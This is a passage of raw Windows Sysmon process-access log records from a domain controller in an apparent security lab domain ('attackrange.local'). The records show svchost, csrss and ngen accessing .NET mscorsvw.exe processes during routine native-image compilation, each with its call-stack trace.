|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9137-6005-0E02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.031{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9137-6005-0E02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:31.031{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9137-6005-0E02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.375{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-2102-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.360{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-2102-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.360{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-2102-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.235{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-2002-00000000A301}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.235{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-2002-00000000A301}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.235{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-2002-00000000A301}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-1F02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.172{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-1F02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.172{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-1F02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.141{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-1E02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.141{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-1E02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.141{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-1E02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.062{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-1D02-00000000A301}648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.047{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-1D02-00000000A301}648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-1D02-00000000A301}648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-1C02-00000000A301}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.000{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-1C02-00000000A301}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.000{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-1C02-00000000A301}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2702-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.954{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2702-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.954{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2702-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Wind